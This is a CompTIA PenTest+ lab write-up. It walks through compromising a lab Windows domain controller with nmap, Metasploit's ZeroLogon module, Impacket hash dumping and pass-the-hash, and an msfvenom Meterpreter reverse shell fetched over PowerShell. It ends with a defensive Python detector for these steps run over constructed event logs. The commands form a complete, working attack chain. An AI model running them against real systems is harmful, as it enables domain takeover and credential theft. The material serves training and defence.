This project was completed as part of my learning path toward the CompTIA PenTest+ certification.
The lab focused on using the Metasploit Framework (MSF) to discover, exploit, and maintain access to vulnerable systems within a simulated enterprise environment.
The exercises involved reconnaissance, remote exploitation, post-exploitation persistence, and payload delivery using Metasploit and Impacket tools.
The objective was to use Metasploit and complementary tools to:
- Discover active hosts and services on a target subnet.
- Perform vulnerability exploitation using Metasploit modules.
- Conduct credential extraction and pass-the-hash attacks with Impacket.
- Establish remote access and deposit a Meterpreter payload.
- Demonstrate post-exploitation persistence and command-and-control functionality.
- Using Metasploit Framework for reconnaissance, scanning, and exploitation.
- Conducting ZeroLogon (CVE-2020-1472) privilege escalation attacks.
- Utilizing Impacket for hash dumping and pass-the-hash exploitation.
- Creating and deploying Meterpreter reverse shells.
- Using msfvenom to generate payload executables.
- Managing sessions, handlers, and background processes within MSF.
- Understanding the workflow of multi-stage exploitation and remote persistence.
- Kali Linux VM (attacker system)
- Windows Server 2019 (DC10) (target system)
- Metasploit Framework (MSF)
- Impacket toolkit
- nmap for discovery and port scanning
- PostgreSQL (MSF database service)
- PowerShell (for remote file transfer)
- msfvenom for payload generation
- Started PostgreSQL, initialized the MSF database, and checked the database connection from msfconsole:

```
systemctl start postgresql
msfdb init
msfconsole
db_status
```

- Performed a subnet scan using nmap and imported the results:

```
nmap 10.1.16.0/24 -F -A -oX targets.xml
db_import targets.xml
hosts
```

- Removed the local Kali IP from the hosts table and confirmed:

```
hosts -d 10.1.16.66
hosts
```

- Performed additional port scans within MSF:

```
search portscan
use auxiliary/scanner/portscan/syn
set PORTS 10-100
hosts -R
setg THREADS 3
run
services
```

- Scanned SMB versions to identify Windows systems:

```
search smb version
use auxiliary/scanner/smb/smb_version
hosts -R
run
hosts
```

- Discovered 10.1.16.1 (DC10) running Windows Server 2019 Standard, exposing LDAP and Kerberos ports.
- Queried LDAP to confirm the domain:

```
search ldap query
use auxiliary/gather/ldap_query
set rhosts 10.1.16.1
run
```

- Domain identified: structureality.local
- Located and used the ZeroLogon exploit module:

```
search zerologon
use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
set nbname dc10
set rhosts 10.1.16.1
exploit
```

- Successfully reset the DC10 machine account password to null:

```
Successfully set the machine account (dc10$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)
```

- Dumped NTLM hashes using Impacket:

```
impacket-secretsdump -just-dc-ntlm structureality/dc10\$@10.1.16.1
```

- Identified domain and local account hashes, confirming the Administrator hash:

```
aad3b435b51404eeaad3b435b51404ee:dae57d78fec919471799ce0fae8236b9
```

- Executed a pass-the-hash attack for remote access:

```
impacket-psexec structureality/administrator@10.1.16.1 -hashes aad3b435b51404eeaad3b435b51404ee:dae57d78fec919471799ce0fae8236b9
```

- Gained a remote command shell:

```
C:\Windows\system32> hostname
DC10
```

- Generated a Meterpreter reverse shell payload using msfvenom:

```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.1.16.66 LPORT=4567 -f exe -o secretfile.exe
```

- Confirmed the file size and launched a temporary web server:

```
ls -l
python3 -m http.server 8080
```

- From the DC10 remote shell, downloaded the payload:

```
powershell -Command "Invoke-WebRequest -Uri http://10.1.16.66:8080/secretfile.exe -OutFile secretfile.exe"
dir secret*
```

- Set up the MSF listener:

```
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.1.16.66
set LPORT 4567
run
```

- Executed the payload on the target:

```
secretfile.exe
```

- Meterpreter session established, backgrounded, and re-entered to confirm remote control over DC10:

```
Meterpreter session 1 opened...
meterpreter > background
sessions
sessions -i 1
sysinfo
```
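As an added example, not part of the lab or of any tool used in it: a defender-side check over constructed Windows event records for the two steps of this chain that a domain controller logs most clearly, the unauthenticated machine-account reset (Security event 4742 with an ANONYMOUS LOGON subject) and the hash-based psexec shell (a type-3 NTLM logon, 4624, followed by a new service, 7045). All event values, including the service name and the benign entries, are constructed; the field names follow the Windows event XML schema.

```python
"""Added example: triage of constructed Windows events for the ZeroLogon reset
and the pass-the-hash remote shell seen in this lab. Security (4624, 4742) and
System (7045) log entries are merged into one time-ordered list."""
from datetime import datetime, timedelta

ANONYMOUS_SID = "S-1-5-7"  # ANONYMOUS LOGON: ZeroLogon resets the DC account without authenticating

EVENTS = [  # constructed sample, not captured from DC10
    # routine self-rotation of the machine account password by the machine itself: benign
    {"id": 4742, "time": "2024-01-01T09:00:00", "SubjectUserSid": "S-1-5-18",
     "SubjectUserName": "DC10$", "TargetUserName": "DC10$", "PasswordLastSet": "1/1/2024 9:00:00 AM"},
    # an unauthenticated subject set the DC's own account password: the ZeroLogon shape
    {"id": 4742, "time": "2024-01-01T10:00:00", "SubjectUserSid": ANONYMOUS_SID,
     "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "DC10$", "PasswordLastSet": "1/1/2024 10:00:00 AM"},
    # NTLM network logon as Administrator from the attacker VM, then a new service seconds later
    {"id": 4624, "time": "2024-01-01T10:05:00", "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "TargetUserName": "Administrator", "IpAddress": "10.1.16.66"},
    {"id": 7045, "time": "2024-01-01T10:05:04", "ServiceName": "XyQw", "ImagePath": "%systemroot%\\abcd.exe"},
    # Kerberos interactive logon by a regular user: benign
    {"id": 4624, "time": "2024-01-01T10:30:00", "LogonType": "2", "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "jdoe", "IpAddress": "10.1.16.50"},
]

def zerologon_indicators(events):
    """4742 (computer account changed) where the subject is ANONYMOUS LOGON and the target
    computer account's password was set ("-" means the attribute did not change)."""
    return [e for e in events
            if e["id"] == 4742 and e.get("SubjectUserSid") == ANONYMOUS_SID
            and e.get("TargetUserName", "").endswith("$")
            and e.get("PasswordLastSet", "-") != "-"]

def pth_service_indicators(events, privileged=("Administrator",), window_s=60):
    """Pair each NTLM network logon (4624, type 3) of a privileged account with a service
    install (7045) within window_s seconds: the shape of a psexec-style shell opened with a hash."""
    logons = [e for e in events if e["id"] == 4624 and e.get("LogonType") == "3"
              and e.get("AuthenticationPackageName") == "NTLM"
              and e.get("TargetUserName") in privileged]
    services = [e for e in events if e["id"] == 7045]
    hits = []
    for lg in logons:
        t0 = datetime.fromisoformat(lg["time"])
        for sv in services:
            delta = datetime.fromisoformat(sv["time"]) - t0
            if timedelta(0) <= delta <= timedelta(seconds=window_s):
                hits.append((lg["TargetUserName"], lg.get("IpAddress"), sv["ServiceName"]))
    return hits

if __name__ == "__main__":
    print("zerologon:", [(e["SubjectUserName"], e["TargetUserName"]) for e in zerologon_indicators(EVENTS)])
    print("pth+service:", pth_service_indicators(EVENTS))
```

On domain controllers carrying the August 2020 Netlogon update, NETLOGON events 5827 and 5829 in the System log record denied and allowed vulnerable secure-channel connections directly, so pairing them with the 4742 check separates a blocked attempt from a completed reset.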
- Attacker Role: Demonstrate exploitation and post-exploitation using Metasploit responsibly.
- Risks:
  - Unintended damage to production systems if tests are not sandboxed.
  - Legal and ethical violations if used without authorization.
  - Persistence mechanisms could create backdoors.
- Mitigations:
  - Conduct only in controlled, authorized lab environments.
  - Document every action for audit and learning.
  - Restore affected systems to original state after testing.
- Discovered & Enumerated: Hosts and services via nmap & MSF.
- Exploited Vulnerability: ZeroLogon (CVE-2020-1472) to gain DC10 access.
- Extracted Credentials: Domain hashes using Impacket.
- Gained Remote Shell: Through pass-the-hash attack.
- Established Meterpreter: Successful reverse TCP payload execution.
- Reinforced PenTest+ objectives:
  - Perform network attacks using appropriate tools.
  - Execute authentication and credential attacks.
  - Use scripting and automation for attack execution.
  - Move laterally and establish persistence.
This lab demonstrated full-cycle exploitation, from reconnaissance and privilege escalation to persistence using Meterpreter — a critical capability in the CompTIA PenTest+ certification journey.